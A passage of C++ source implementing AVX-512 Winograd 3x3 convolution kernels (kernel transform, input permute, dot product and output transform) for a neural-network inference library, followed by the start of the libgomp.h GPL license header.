_mm512_store_ps(output0_tm + 16, _sum1);
output0_tm += 16 * 2;
}
for (; i < tiles; i++)
{
const float* r0 = bb2.row(i / 12 + (i % 12) / 8 + (i % 12 % 8) / 4 + (i % 12 % 4) / 2 + i % 12 % 2);
const float* k0 = kernel0_tm.row(r);
int nn = inch * 16; // inch always > 0
__m512 _sum0 = _mm512_setzero_ps();
for (int j = 0; j < nn; j++)
{
__m512 _w0 = _mm512_load_ps(k0);
__m512 _val0 = _mm512_set1_ps(r0[0]);
_sum0 = _mm512_fmadd_ps(_val0, _w0, _sum0);
r0 += 1;
k0 += 16;
}
_mm512_store_ps(output0_tm, _sum0);
output0_tm += 16;
}
}
}
}
bottom_blob_tm = Mat();
// END dot
// BEGIN transform output
Mat top_blob_bordered;
if (outw == top_blob.w && outh == top_blob.h)
{
top_blob_bordered = top_blob;
}
else
{
top_blob_bordered.create(outw, outh, outch, elemsize, elempack, opt.workspace_allocator);
}
{
conv3x3s1_winograd63_transform_output_pack16_avx512(top_blob_tm, top_blob_bordered, bias, opt);
}
// END transform output
// cut result pad
copy_cut_border(top_blob_bordered, top_blob, 0, top_blob_bordered.h - top_blob.h, 0, top_blob_bordered.w - top_blob.w, opt);
}
static void conv3x3s1_winograd43_transform_kernel_pack16_avx512(const Mat& kernel, Mat& kernel_tm_pack4, int inch, int outch, const Option& opt)
{
// winograd43 transform kernel
Mat kernel_tm(6 * 6, inch, outch);
const float ktm[6][3] = {
{1.0f / 4, 0.0f, 0.0f},
{-1.0f / 6, -1.0f / 6, -1.0f / 6},
{-1.0f / 6, 1.0f / 6, -1.0f / 6},
{1.0f / 24, 1.0f / 12, 1.0f / 6},
{1.0f / 24, -1.0f / 12, 1.0f / 6},
{0.0f, 0.0f, 1.0f}
};
#pragma omp parallel for num_threads(opt.num_threads)
for (int p = 0; p < outch; p++)
{
for (int q = 0; q < inch; q++)
{
const float* kernel0 = (const float*)kernel + p * inch * 9 + q * 9;
float* kernel_tm0 = kernel_tm.channel(p).row(q);
// transform kernel
const float* k0 = kernel0;
const float* k1 = kernel0 + 3;
const float* k2 = kernel0 + 6;
// h
float tmp[6][3];
for (int i = 0; i < 6; i++)
{
tmp[i][0] = k0[0] * ktm[i][0] + k0[1] * ktm[i][1] + k0[2] * ktm[i][2];
tmp[i][1] = k1[0] * ktm[i][0] + k1[1] * ktm[i][1] + k1[2] * ktm[i][2];
tmp[i][2] = k2[0] * ktm[i][0] + k2[1] * ktm[i][1] + k2[2] * ktm[i][2];
}
// U
for (int j = 0; j < 6; j++)
{
float* tmpp = &tmp[j][0];
for (int i = 0; i < 6; i++)
{
kernel_tm0[j * 6 + i] = tmpp[0] * ktm[i][0] + tmpp[1] * ktm[i][1] + tmpp[2] * ktm[i][2];
}
}
}
}
// interleave
// src = 36-inch-outch
// dst = 16b-16a-inch/16a-36-outch/16b
kernel_tm_pack4.create(inch / 16, 36, outch / 16, (size_t)4u * 16 * 16, 16 * 16);
for (int q = 0; q + 15 < outch; q += 16)
{
Mat g0 = kernel_tm_pack4.channel(q / 16);
for (int k = 0; k < 36; k++)
{
float* g00 = g0.row<float>(k);
for (int p = 0; p + 15 < inch; p += 16)
{
for (int i = 0; i < 16; i++)
{
for (int j = 0; j < 16; j++)
{
const float* k00 = kernel_tm.channel(q + j).row(p + i);
g00[0] = k00[k];
g00++;
}
}
}
}
}
}
static void conv3x3s1_winograd43_pack16_avx512(const Mat& bottom_blob, Mat& top_blob, const Mat& kernel_tm, const Mat& bias, const Option& opt)
{
int w = bottom_blob.w;
int h = bottom_blob.h;
int inch = bottom_blob.c;
size_t elemsize = bottom_blob.elemsize;
int elempack = bottom_blob.elempack;
int outw = top_blob.w;
int outh = top_blob.h;
int outch = top_blob.c;
// pad to 4n+2
Mat bottom_blob_bordered = bottom_blob;
outw = (outw + 3) / 4 * 4;
outh = (outh + 3) / 4 * 4;
w = outw + 2;
h = outh + 2;
copy_make_border(bottom_blob, bottom_blob_bordered, 0, h - bottom_blob.h, 0, w - bottom_blob.w, BORDER_CONSTANT, 0.f, opt);
// BEGIN transform input
Mat bottom_blob_tm;
{
int w_tiles = outw / 4;
int h_tiles = outh / 4;
const int tiles = w_tiles * h_tiles;
bottom_blob_tm.create(tiles, 36, inch, elemsize, elempack, opt.workspace_allocator);
conv3x3s1_winograd43_transform_input_pack16_avx512(bottom_blob_bordered, bottom_blob_tm, opt);
}
bottom_blob_bordered = Mat();
// END transform input
// BEGIN dot
Mat top_blob_tm;
{
int w_tm = outw / 4 * 6;
int h_tm = outh / 4 * 6;
const int tiles = h_tm / 6 * w_tm / 6;
// permute
// bottom_blob_tm.create(tiles, 36, inch, elemsize, elempack, opt.workspace_allocator);
Mat bottom_blob_tm2;
if (tiles >= 12)
bottom_blob_tm2.create(12 * inch, tiles / 12 + (tiles % 12) / 8 + (tiles % 12 % 8) / 4 + (tiles % 12 % 4) / 2 + tiles % 12 % 2, 36, 4u * elempack, elempack, opt.workspace_allocator);
else if (tiles >= 8)
bottom_blob_tm2.create(8 * inch, tiles / 8 + (tiles % 8) / 4 + (tiles % 4) / 2 + tiles % 2, 36, 4u * elempack, elempack, opt.workspace_allocator);
else if (tiles >= 4)
bottom_blob_tm2.create(4 * inch, tiles / 4 + (tiles % 4) / 2 + tiles % 2, 36, 4u * elempack, elempack, opt.workspace_allocator);
else if (tiles >= 2)
bottom_blob_tm2.create(2 * inch, tiles / 2 + tiles % 2, 36, 4u * elempack, elempack, opt.workspace_allocator);
else // if (tiles >= 1)
bottom_blob_tm2.create(1 * inch, tiles, 36, 4u * elempack, elempack, opt.workspace_allocator);
#pragma omp parallel for num_threads(opt.num_threads)
for (int r = 0; r < 36; r++)
{
Mat tm2 = bottom_blob_tm2.channel(r);
// tile
int i = 0;
for (; i + 11 < tiles; i += 12)
{
float* tmpptr = tm2.row(i / 12);
const float* r0 = bottom_blob_tm;
r0 += (r * tiles + i) * 16;
for (int q = 0; q < inch; q++)
{
// transpose 16x12
__m512 _r0 = _mm512_load_ps(r0);
__m512 _r1 = _mm512_load_ps(r0 + 16);
__m512 _r2 = _mm512_load_ps(r0 + 16 * 2);
__m512 _r3 = _mm512_load_ps(r0 + 16 * 3);
__m512 _r4 = _mm512_load_ps(r0 + 16 * 4);
__m512 _r5 = _mm512_load_ps(r0 + 16 * 5);
__m512 _r6 = _mm512_load_ps(r0 + 16 * 6);
__m512 _r7 = _mm512_load_ps(r0 + 16 * 7);
__m512 _r8 = _mm512_load_ps(r0 + 16 * 8);
__m512 _r9 = _mm512_load_ps(r0 + 16 * 9);
__m512 _ra = _mm512_load_ps(r0 + 16 * 10);
__m512 _rb = _mm512_load_ps(r0 + 16 * 11);
__m512 _tmp0 = _mm512_unpacklo_ps(_r0, _r1);
__m512 _tmp1 = _mm512_unpackhi_ps(_r0, _r1);
__m512 _tmp2 = _mm512_unpacklo_ps(_r2, _r3);
__m512 _tmp3 = _mm512_unpackhi_ps(_r2, _r3);
__m512 _tmp4 = _mm512_unpacklo_ps(_r4, _r5);
__m512 _tmp5 = _mm512_unpackhi_ps(_r4, _r5);
__m512 _tmp6 = _mm512_unpacklo_ps(_r6, _r7);
__m512 _tmp7 = _mm512_unpackhi_ps(_r6, _r7);
__m512 _tmp8 = _mm512_unpacklo_ps(_r8, _r9);
__m512 _tmp9 = _mm512_unpackhi_ps(_r8, _r9);
__m512 _tmpa = _mm512_unpacklo_ps(_ra, _rb);
__m512 _tmpb = _mm512_unpackhi_ps(_ra, _rb);
__m512 _tmpc = _mm512_shuffle_ps(_tmp0, _tmp2, _MM_SHUFFLE(1, 0, 1, 0));
__m512 _tmpd = _mm512_shuffle_ps(_tmp0, _tmp2, _MM_SHUFFLE(3, 2, 3, 2));
__m512 _tmpe = _mm512_shuffle_ps(_tmp1, _tmp3, _MM_SHUFFLE(1, 0, 1, 0));
__m512 _tmpf = _mm512_shuffle_ps(_tmp1, _tmp3, _MM_SHUFFLE(3, 2, 3, 2));
__m512 _tmpg = _mm512_shuffle_ps(_tmp4, _tmp6, _MM_SHUFFLE(1, 0, 1, 0));
__m512 _tmph = _mm512_shuffle_ps(_tmp4, _tmp6, _MM_SHUFFLE(3, 2, 3, 2));
__m512 _tmpi = _mm512_shuffle_ps(_tmp5, _tmp7, _MM_SHUFFLE(1, 0, 1, 0));
__m512 _tmpj = _mm512_shuffle_ps(_tmp5, _tmp7, _MM_SHUFFLE(3, 2, 3, 2));
__m512 _tmpk = _mm512_shuffle_ps(_tmp8, _tmpa, _MM_SHUFFLE(1, 0, 1, 0));
__m512 _tmpl = _mm512_shuffle_ps(_tmp8, _tmpa, _MM_SHUFFLE(3, 2, 3, 2));
__m512 _tmpm = _mm512_shuffle_ps(_tmp9, _tmpb, _MM_SHUFFLE(1, 0, 1, 0));
__m512 _tmpn = _mm512_shuffle_ps(_tmp9, _tmpb, _MM_SHUFFLE(3, 2, 3, 2));
_tmp0 = _mm512_shuffle_f32x4(_tmpc, _tmpg, _MM_SHUFFLE(2, 0, 2, 0));
_tmp1 = _mm512_shuffle_f32x4(_tmpk, _tmpd, _MM_SHUFFLE(2, 0, 2, 0));
_tmp2 = _mm512_shuffle_f32x4(_tmph, _tmpl, _MM_SHUFFLE(2, 0, 2, 0));
_tmp3 = _mm512_shuffle_f32x4(_tmpe, _tmpi, _MM_SHUFFLE(2, 0, 2, 0));
_tmp4 = _mm512_shuffle_f32x4(_tmpm, _tmpf, _MM_SHUFFLE(2, 0, 2, 0));
_tmp5 = _mm512_shuffle_f32x4(_tmpj, _tmpn, _MM_SHUFFLE(2, 0, 2, 0));
_tmp6 = _mm512_shuffle_f32x4(_tmpc, _tmpg, _MM_SHUFFLE(3, 1, 3, 1));
_tmp7 = _mm512_shuffle_f32x4(_tmpk, _tmpd, _MM_SHUFFLE(3, 1, 3, 1));
_tmp8 = _mm512_shuffle_f32x4(_tmph, _tmpl, _MM_SHUFFLE(3, 1, 3, 1));
_tmp9 = _mm512_shuffle_f32x4(_tmpe, _tmpi, _MM_SHUFFLE(3, 1, 3, 1));
_tmpa = _mm512_shuffle_f32x4(_tmpm, _tmpf, _MM_SHUFFLE(3, 1, 3, 1));
_tmpb = _mm512_shuffle_f32x4(_tmpj, _tmpn, _MM_SHUFFLE(3, 1, 3, 1));
_r0 = _mm512_shuffle_f32x4(_tmp0, _tmp1, _MM_SHUFFLE(2, 0, 2, 0));
_r1 = _mm512_shuffle_f32x4(_tmp2, _tmp3, _MM_SHUFFLE(2, 0, 2, 0));
_r2 = _mm512_shuffle_f32x4(_tmp4, _tmp5, _MM_SHUFFLE(2, 0, 2, 0));
_r3 = _mm512_shuffle_f32x4(_tmp6, _tmp7, _MM_SHUFFLE(2, 0, 2, 0));
_r4 = _mm512_shuffle_f32x4(_tmp8, _tmp9, _MM_SHUFFLE(2, 0, 2, 0));
_r5 = _mm512_shuffle_f32x4(_tmpa, _tmpb, _MM_SHUFFLE(2, 0, 2, 0));
_r6 = _mm512_shuffle_f32x4(_tmp0, _tmp1, _MM_SHUFFLE(3, 1, 3, 1));
_r7 = _mm512_shuffle_f32x4(_tmp2, _tmp3, _MM_SHUFFLE(3, 1, 3, 1));
_r8 = _mm512_shuffle_f32x4(_tmp4, _tmp5, _MM_SHUFFLE(3, 1, 3, 1));
_r9 = _mm512_shuffle_f32x4(_tmp6, _tmp7, _MM_SHUFFLE(3, 1, 3, 1));
_ra = _mm512_shuffle_f32x4(_tmp8, _tmp9, _MM_SHUFFLE(3, 1, 3, 1));
_rb = _mm512_shuffle_f32x4(_tmpa, _tmpb, _MM_SHUFFLE(3, 1, 3, 1));
_mm512_store_ps(tmpptr, _r0);
_mm512_store_ps(tmpptr + 16, _r1);
_mm512_store_ps(tmpptr + 16 * 2, _r2);
_mm512_store_ps(tmpptr + 16 * 3, _r3);
_mm512_store_ps(tmpptr + 16 * 4, _r4);
_mm512_store_ps(tmpptr + 16 * 5, _r5);
_mm512_store_ps(tmpptr + 16 * 6, _r6);
_mm512_store_ps(tmpptr + 16 * 7, _r7);
_mm512_store_ps(tmpptr + 16 * 8, _r8);
_mm512_store_ps(tmpptr + 16 * 9, _r9);
_mm512_store_ps(tmpptr + 16 * 10, _ra);
_mm512_store_ps(tmpptr + 16 * 11, _rb);
r0 += bottom_blob_tm.cstep * 16;
tmpptr += 192;
}
}
for (; i + 7 < tiles; i += 8)
{
float* tmpptr = tm2.row(i / 12 + (i % 12) / 8);
const float* r0 = bottom_blob_tm;
r0 += (r * tiles + i) * 16;
for (int q = 0; q < inch; q++)
{
// transpose 16x8
__m512 _r0 = _mm512_load_ps(r0);
__m512 _r1 = _mm512_load_ps(r0 + 16);
__m512 _r2 = _mm512_load_ps(r0 + 16 * 2);
__m512 _r3 = _mm512_load_ps(r0 + 16 * 3);
__m512 _r4 = _mm512_load_ps(r0 + 16 * 4);
__m512 _r5 = _mm512_load_ps(r0 + 16 * 5);
__m512 _r6 = _mm512_load_ps(r0 + 16 * 6);
__m512 _r7 = _mm512_load_ps(r0 + 16 * 7);
__m512 _tmp0 = _mm512_unpacklo_ps(_r0, _r1);
__m512 _tmp1 = _mm512_unpackhi_ps(_r0, _r1);
__m512 _tmp2 = _mm512_unpacklo_ps(_r2, _r3);
__m512 _tmp3 = _mm512_unpackhi_ps(_r2, _r3);
__m512 _tmp4 = _mm512_unpacklo_ps(_r4, _r5);
__m512 _tmp5 = _mm512_unpackhi_ps(_r4, _r5);
__m512 _tmp6 = _mm512_unpacklo_ps(_r6, _r7);
__m512 _tmp7 = _mm512_unpackhi_ps(_r6, _r7);
__m512 _tmp8 = _mm512_shuffle_ps(_tmp0, _tmp2, _MM_SHUFFLE(1, 0, 1, 0));
__m512 _tmp9 = _mm512_shuffle_ps(_tmp0, _tmp2, _MM_SHUFFLE(3, 2, 3, 2));
__m512 _tmpa = _mm512_shuffle_ps(_tmp1, _tmp3, _MM_SHUFFLE(1, 0, 1, 0));
__m512 _tmpb = _mm512_shuffle_ps(_tmp1, _tmp3, _MM_SHUFFLE(3, 2, 3, 2));
__m512 _tmpc = _mm512_shuffle_ps(_tmp4, _tmp6, _MM_SHUFFLE(1, 0, 1, 0));
__m512 _tmpd = _mm512_shuffle_ps(_tmp4, _tmp6, _MM_SHUFFLE(3, 2, 3, 2));
__m512 _tmpe = _mm512_shuffle_ps(_tmp5, _tmp7, _MM_SHUFFLE(1, 0, 1, 0));
__m512 _tmpf = _mm512_shuffle_ps(_tmp5, _tmp7, _MM_SHUFFLE(3, 2, 3, 2));
_tmp0 = _mm512_shuffle_f32x4(_tmp8, _tmpc, _MM_SHUFFLE(2, 0, 2, 0));
_tmp1 = _mm512_shuffle_f32x4(_tmp9, _tmpd, _MM_SHUFFLE(2, 0, 2, 0));
_tmp2 = _mm512_shuffle_f32x4(_tmpa, _tmpe, _MM_SHUFFLE(2, 0, 2, 0));
_tmp3 = _mm512_shuffle_f32x4(_tmpb, _tmpf, _MM_SHUFFLE(2, 0, 2, 0));
_tmp4 = _mm512_shuffle_f32x4(_tmp8, _tmpc, _MM_SHUFFLE(3, 1, 3, 1));
_tmp5 = _mm512_shuffle_f32x4(_tmp9, _tmpd, _MM_SHUFFLE(3, 1, 3, 1));
_tmp6 = _mm512_shuffle_f32x4(_tmpa, _tmpe, _MM_SHUFFLE(3, 1, 3, 1));
_tmp7 = _mm512_shuffle_f32x4(_tmpb, _tmpf, _MM_SHUFFLE(3, 1, 3, 1));
_r0 = _mm512_shuffle_f32x4(_tmp0, _tmp1, _MM_SHUFFLE(2, 0, 2, 0));
_r1 = _mm512_shuffle_f32x4(_tmp2, _tmp3, _MM_SHUFFLE(2, 0, 2, 0));
_r2 = _mm512_shuffle_f32x4(_tmp4, _tmp5, _MM_SHUFFLE(2, 0, 2, 0));
_r3 = _mm512_shuffle_f32x4(_tmp6, _tmp7, _MM_SHUFFLE(2, 0, 2, 0));
_r4 = _mm512_shuffle_f32x4(_tmp0, _tmp1, _MM_SHUFFLE(3, 1, 3, 1));
_r5 = _mm512_shuffle_f32x4(_tmp2, _tmp3, _MM_SHUFFLE(3, 1, 3, 1));
_r6 = _mm512_shuffle_f32x4(_tmp4, _tmp5, _MM_SHUFFLE(3, 1, 3, 1));
_r7 = _mm512_shuffle_f32x4(_tmp6, _tmp7, _MM_SHUFFLE(3, 1, 3, 1));
_mm512_store_ps(tmpptr, _r0);
_mm512_store_ps(tmpptr + 16, _r1);
_mm512_store_ps(tmpptr + 16 * 2, _r2);
_mm512_store_ps(tmpptr + 16 * 3, _r3);
_mm512_store_ps(tmpptr + 16 * 4, _r4);
_mm512_store_ps(tmpptr + 16 * 5, _r5);
_mm512_store_ps(tmpptr + 16 * 6, _r6);
_mm512_store_ps(tmpptr + 16 * 7, _r7);
r0 += bottom_blob_tm.cstep * 16;
tmpptr += 128;
}
}
for (; i + 3 < tiles; i += 4)
{
float* tmpptr = tm2.row(i / 12 + (i % 12) / 8 + (i % 12 % 8) / 4);
const float* r0 = bottom_blob_tm;
r0 += (r * tiles + i) * 16;
for (int q = 0; q < inch; q++)
{
// transpose 16x4
__m512 _r0 = _mm512_load_ps(r0);
__m512 _r1 = _mm512_load_ps(r0 + 16);
__m512 _r2 = _mm512_load_ps(r0 + 16 * 2);
__m512 _r3 = _mm512_load_ps(r0 + 16 * 3);
__m512 _tmp0 = _mm512_unpacklo_ps(_r0, _r1);
__m512 _tmp1 = _mm512_unpackhi_ps(_r0, _r1);
__m512 _tmp2 = _mm512_unpacklo_ps(_r2, _r3);
__m512 _tmp3 = _mm512_unpackhi_ps(_r2, _r3);
__m512 _tmp4 = _mm512_shuffle_ps(_tmp0, _tmp2, _MM_SHUFFLE(1, 0, 1, 0));
__m512 _tmp5 = _mm512_shuffle_ps(_tmp0, _tmp2, _MM_SHUFFLE(3, 2, 3, 2));
__m512 _tmp6 = _mm512_shuffle_ps(_tmp1, _tmp3, _MM_SHUFFLE(1, 0, 1, 0));
__m512 _tmp7 = _mm512_shuffle_ps(_tmp1, _tmp3, _MM_SHUFFLE(3, 2, 3, 2));
_tmp0 = _mm512_shuffle_f32x4(_tmp4, _tmp5, _MM_SHUFFLE(2, 0, 2, 0));
_tmp1 = _mm512_shuffle_f32x4(_tmp6, _tmp7, _MM_SHUFFLE(2, 0, 2, 0));
_tmp2 = _mm512_shuffle_f32x4(_tmp4, _tmp5, _MM_SHUFFLE(3, 1, 3, 1));
_tmp3 = _mm512_shuffle_f32x4(_tmp6, _tmp7, _MM_SHUFFLE(3, 1, 3, 1));
_r0 = _mm512_shuffle_f32x4(_tmp0, _tmp1, _MM_SHUFFLE(2, 0, 2, 0));
_r1 = _mm512_shuffle_f32x4(_tmp2, _tmp3, _MM_SHUFFLE(2, 0, 2, 0));
_r2 = _mm512_shuffle_f32x4(_tmp0, _tmp1, _MM_SHUFFLE(3, 1, 3, 1));
_r3 = _mm512_shuffle_f32x4(_tmp2, _tmp3, _MM_SHUFFLE(3, 1, 3, 1));
_mm512_store_ps(tmpptr, _r0);
_mm512_store_ps(tmpptr + 16, _r1);
_mm512_store_ps(tmpptr + 16 * 2, _r2);
_mm512_store_ps(tmpptr + 16 * 3, _r3);
r0 += bottom_blob_tm.cstep * 16;
tmpptr += 64;
}
}
for (; i + 1 < tiles; i += 2)
{
float* tmpptr = tm2.row(i / 12 + (i % 12) / 8 + (i % 12 % 8) / 4 + (i % 12 % 4) / 2);
const float* r0 = bottom_blob_tm;
r0 += (r * tiles + i) * 16;
for (int q = 0; q < inch; q++)
{
// transpose 16x2
__m512 _r0 = _mm512_load_ps(r0);
__m512 _r1 = _mm512_load_ps(r0 + 16);
__m512 _tmp0 = _mm512_unpacklo_ps(_r0, _r1);
__m512 _tmp1 = _mm512_unpackhi_ps(_r0, _r1);
__m512 _tmp2 = _mm512_shuffle_f32x4(_tmp0, _tmp1, _MM_SHUFFLE(2, 0, 2, 0));
__m512 _tmp3 = _mm512_shuffle_f32x4(_tmp0, _tmp1, _MM_SHUFFLE(3, 1, 3, 1));
_r0 = _mm512_shuffle_f32x4(_tmp2, _tmp3, _MM_SHUFFLE(2, 0, 2, 0));
_r1 = _mm512_shuffle_f32x4(_tmp2, _tmp3, _MM_SHUFFLE(3, 1, 3, 1));
_mm512_store_ps(tmpptr, _r0);
_mm512_store_ps(tmpptr + 16, _r1);
r0 += bottom_blob_tm.cstep * 16;
tmpptr += 32;
}
}
for (; i < tiles; i++)
{
float* tmpptr = tm2.row(i / 12 + (i % 12) / 8 + (i % 12 % 8) / 4 + (i % 12 % 4) / 2 + i % 12 % 2);
const float* r0 = bottom_blob_tm;
r0 += (r * tiles + i) * 16;
for (int q = 0; q < inch; q++)
{
__m512 _val = _mm512_load_ps(r0);
_mm512_store_ps(tmpptr, _val);
r0 += bottom_blob_tm.cstep * 16;
tmpptr += 16;
}
}
}
bottom_blob_tm = Mat();
// permute end
top_blob_tm.create(tiles, 36, outch, 4u * elempack, elempack, opt.workspace_allocator);
#pragma omp parallel for num_threads(opt.num_threads)
for (int p = 0; p < outch; p++)
{
float* output0_tm = top_blob_tm.channel(p);
const Mat kernel0_tm = kernel_tm.channel(p);
for (int r = 0; r < 36; r++)
{
const Mat bb2 = bottom_blob_tm2.channel(r);
int i = 0;
for (; i + 11 < tiles; i += 12)
{
const float* r0 = bb2.row(i / 12);
const float* k0 = kernel0_tm.row(r);
int nn = inch * 16; // inch always > 0
__m512 _sum0 = _mm512_setzero_ps();
__m512 _sum1 = _mm512_setzero_ps();
__m512 _sum2 = _mm512_setzero_ps();
__m512 _sum3 = _mm512_setzero_ps();
__m512 _sum4 = _mm512_setzero_ps();
__m512 _sum5 = _mm512_setzero_ps();
__m512 _sum6 = _mm512_setzero_ps();
__m512 _sum7 = _mm512_setzero_ps();
__m512 _sum8 = _mm512_setzero_ps();
__m512 _sum9 = _mm512_setzero_ps();
__m512 _suma = _mm512_setzero_ps();
__m512 _sumb = _mm512_setzero_ps();
for (int j = 0; j < nn; j++)
{
__m512 _w0 = _mm512_load_ps(k0);
__m512 _val0 = _mm512_set1_ps(r0[0]);
__m512 _val1 = _mm512_set1_ps(r0[1]);
_sum0 = _mm512_fmadd_ps(_val0, _w0, _sum0);
_sum1 = _mm512_fmadd_ps(_val1, _w0, _sum1);
__m512 _val2 = _mm512_set1_ps(r0[2]);
__m512 _val3 = _mm512_set1_ps(r0[3]);
_sum2 = _mm512_fmadd_ps(_val2, _w0, _sum2);
_sum3 = _mm512_fmadd_ps(_val3, _w0, _sum3);
__m512 _val4 = _mm512_set1_ps(r0[4]);
__m512 _val5 = _mm512_set1_ps(r0[5]);
_sum4 = _mm512_fmadd_ps(_val4, _w0, _sum4);
_sum5 = _mm512_fmadd_ps(_val5, _w0, _sum5);
__m512 _val6 = _mm512_set1_ps(r0[6]);
__m512 _val7 = _mm512_set1_ps(r0[7]);
_sum6 = _mm512_fmadd_ps(_val6, _w0, _sum6);
_sum7 = _mm512_fmadd_ps(_val7, _w0, _sum7);
__m512 _val8 = _mm512_set1_ps(r0[8]);
__m512 _val9 = _mm512_set1_ps(r0[9]);
_sum8 = _mm512_fmadd_ps(_val8, _w0, _sum8);
_sum9 = _mm512_fmadd_ps(_val9, _w0, _sum9);
__m512 _vala = _mm512_set1_ps(r0[10]);
__m512 _valb = _mm512_set1_ps(r0[11]);
_suma = _mm512_fmadd_ps(_vala, _w0, _suma);
_sumb = _mm512_fmadd_ps(_valb, _w0, _sumb);
r0 += 12;
k0 += 16;
}
_mm512_store_ps(output0_tm, _sum0);
_mm512_store_ps(output0_tm + 16, _sum1);
_mm512_store_ps(output0_tm + 16 * 2, _sum2);
_mm512_store_ps(output0_tm + 16 * 3, _sum3);
_mm512_store_ps(output0_tm + 16 * 4, _sum4);
_mm512_store_ps(output0_tm + 16 * 5, _sum5);
_mm512_store_ps(output0_tm + 16 * 6, _sum6);
_mm512_store_ps(output0_tm + 16 * 7, _sum7);
_mm512_store_ps(output0_tm + 16 * 8, _sum8);
_mm512_store_ps(output0_tm + 16 * 9, _sum9);
_mm512_store_ps(output0_tm + 16 * 10, _suma);
_mm512_store_ps(output0_tm + 16 * 11, _sumb);
output0_tm += 16 * 12;
}
for (; i + 7 < tiles; i += 8)
{
const float* r0 = bb2.row(i / 12 + (i % 12) / 8);
const float* k0 = kernel0_tm.row(r);
int nn = inch * 16; // inch always > 0
__m512 _sum0 = _mm512_setzero_ps();
__m512 _sum1 = _mm512_setzero_ps();
__m512 _sum2 = _mm512_setzero_ps();
__m512 _sum3 = _mm512_setzero_ps();
__m512 _sum4 = _mm512_setzero_ps();
__m512 _sum5 = _mm512_setzero_ps();
__m512 _sum6 = _mm512_setzero_ps();
__m512 _sum7 = _mm512_setzero_ps();
for (int j = 0; j < nn; j++)
{
__m512 _w0 = _mm512_load_ps(k0);
__m512 _val0 = _mm512_set1_ps(r0[0]);
__m512 _val1 = _mm512_set1_ps(r0[1]);
_sum0 = _mm512_fmadd_ps(_val0, _w0, _sum0);
_sum1 = _mm512_fmadd_ps(_val1, _w0, _sum1);
__m512 _val2 = _mm512_set1_ps(r0[2]);
__m512 _val3 = _mm512_set1_ps(r0[3]);
_sum2 = _mm512_fmadd_ps(_val2, _w0, _sum2);
_sum3 = _mm512_fmadd_ps(_val3, _w0, _sum3);
__m512 _val4 = _mm512_set1_ps(r0[4]);
__m512 _val5 = _mm512_set1_ps(r0[5]);
_sum4 = _mm512_fmadd_ps(_val4, _w0, _sum4);
_sum5 = _mm512_fmadd_ps(_val5, _w0, _sum5);
__m512 _val6 = _mm512_set1_ps(r0[6]);
__m512 _val7 = _mm512_set1_ps(r0[7]);
_sum6 = _mm512_fmadd_ps(_val6, _w0, _sum6);
_sum7 = _mm512_fmadd_ps(_val7, _w0, _sum7);
r0 += 8;
k0 += 16;
}
_mm512_store_ps(output0_tm, _sum0);
_mm512_store_ps(output0_tm + 16, _sum1);
_mm512_store_ps(output0_tm + 16 * 2, _sum2);
_mm512_store_ps(output0_tm + 16 * 3, _sum3);
_mm512_store_ps(output0_tm + 16 * 4, _sum4);
_mm512_store_ps(output0_tm + 16 * 5, _sum5);
_mm512_store_ps(output0_tm + 16 * 6, _sum6);
_mm512_store_ps(output0_tm + 16 * 7, _sum7);
output0_tm += 16 * 8;
}
for (; i + 3 < tiles; i += 4)
{
const float* r0 = bb2.row(i / 12 + (i % 12) / 8 + (i % 12 % 8) / 4);
const float* k0 = kernel0_tm.row(r);
int nn = inch * 16; // inch always > 0
__m512 _sum0 = _mm512_setzero_ps();
__m512 _sum1 = _mm512_setzero_ps();
__m512 _sum2 = _mm512_setzero_ps();
__m512 _sum3 = _mm512_setzero_ps();
for (int j = 0; j < nn; j++)
{
__m512 _w0 = _mm512_load_ps(k0);
__m512 _val0 = _mm512_set1_ps(r0[0]);
__m512 _val1 = _mm512_set1_ps(r0[1]);
_sum0 = _mm512_fmadd_ps(_val0, _w0, _sum0);
_sum1 = _mm512_fmadd_ps(_val1, _w0, _sum1);
__m512 _val2 = _mm512_set1_ps(r0[2]);
__m512 _val3 = _mm512_set1_ps(r0[3]);
_sum2 = _mm512_fmadd_ps(_val2, _w0, _sum2);
_sum3 = _mm512_fmadd_ps(_val3, _w0, _sum3);
r0 += 4;
k0 += 16;
}
_mm512_store_ps(output0_tm, _sum0);
_mm512_store_ps(output0_tm + 16, _sum1);
_mm512_store_ps(output0_tm + 16 * 2, _sum2);
_mm512_store_ps(output0_tm + 16 * 3, _sum3);
output0_tm += 16 * 4;
}
for (; i + 1 < tiles; i += 2)
{
const float* r0 = bb2.row(i / 12 + (i % 12) / 8 + (i % 12 % 8) / 4 + (i % 12 % 4) / 2);
const float* k0 = kernel0_tm.row(r);
int nn = inch * 16; // inch always > 0
__m512 _sum0 = _mm512_setzero_ps();
__m512 _sum1 = _mm512_setzero_ps();
for (int j = 0; j < nn; j++)
{
__m512 _w0 = _mm512_load_ps(k0);
__m512 _val0 = _mm512_set1_ps(r0[0]);
__m512 _val1 = _mm512_set1_ps(r0[1]);
_sum0 = _mm512_fmadd_ps(_val0, _w0, _sum0);
_sum1 = _mm512_fmadd_ps(_val1, _w0, _sum1);
r0 += 2;
k0 += 16;
}
_mm512_store_ps(output0_tm, _sum0);
_mm512_store_ps(output0_tm + 16, _sum1);
output0_tm += 16 * 2;
}
for (; i < tiles; i++)
{
const float* r0 = bb2.row<const float>(i / 12 + (i % 12) / 8 + (i % 12 % 8) / 4 + (i % 12 % 4) / 2 + i % 12 % 2);
const float* k0 = kernel0_tm.row<const float>(r);
int nn = inch * 16; // inch always > 0
__m512 _sum0 = _mm512_setzero_ps();
for (int j = 0; j < nn; j++)
{
__m512 _w0 = _mm512_load_ps(k0);
__m512 _val0 = _mm512_set1_ps(r0[0]);
_sum0 = _mm512_fmadd_ps(_val0, _w0, _sum0);
r0 += 1;
k0 += 16;
}
_mm512_store_ps(output0_tm, _sum0);
output0_tm += 16;
}
}
}
}
bottom_blob_tm = Mat();
// END dot
// BEGIN transform output
Mat top_blob_bordered;
if (outw == top_blob.w && outh == top_blob.h)
{
top_blob_bordered = top_blob;
}
else
{
top_blob_bordered.create(outw, outh, outch, elemsize, elempack, opt.workspace_allocator);
}
{
conv3x3s1_winograd43_transform_output_pack16_avx512(top_blob_tm, top_blob_bordered, bias, opt);
}
// END transform output
// cut result pad
copy_cut_border(top_blob_bordered, top_blob, 0, top_blob_bordered.h - top_blob.h, 0, top_blob_bordered.w - top_blob.w, opt);
}
|
libgomp.h | /* Copyright (C) 2005-2018 Free Software Foundation, Inc.
Contributed by Richard Henderson <rth@redhat.com>.
This file is part of the GNU Offloading and Multi Processing Library
(libgomp).
Libgomp is free software; you can redistribute it and/or modify it
under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 3, or (at your option)
any later version.
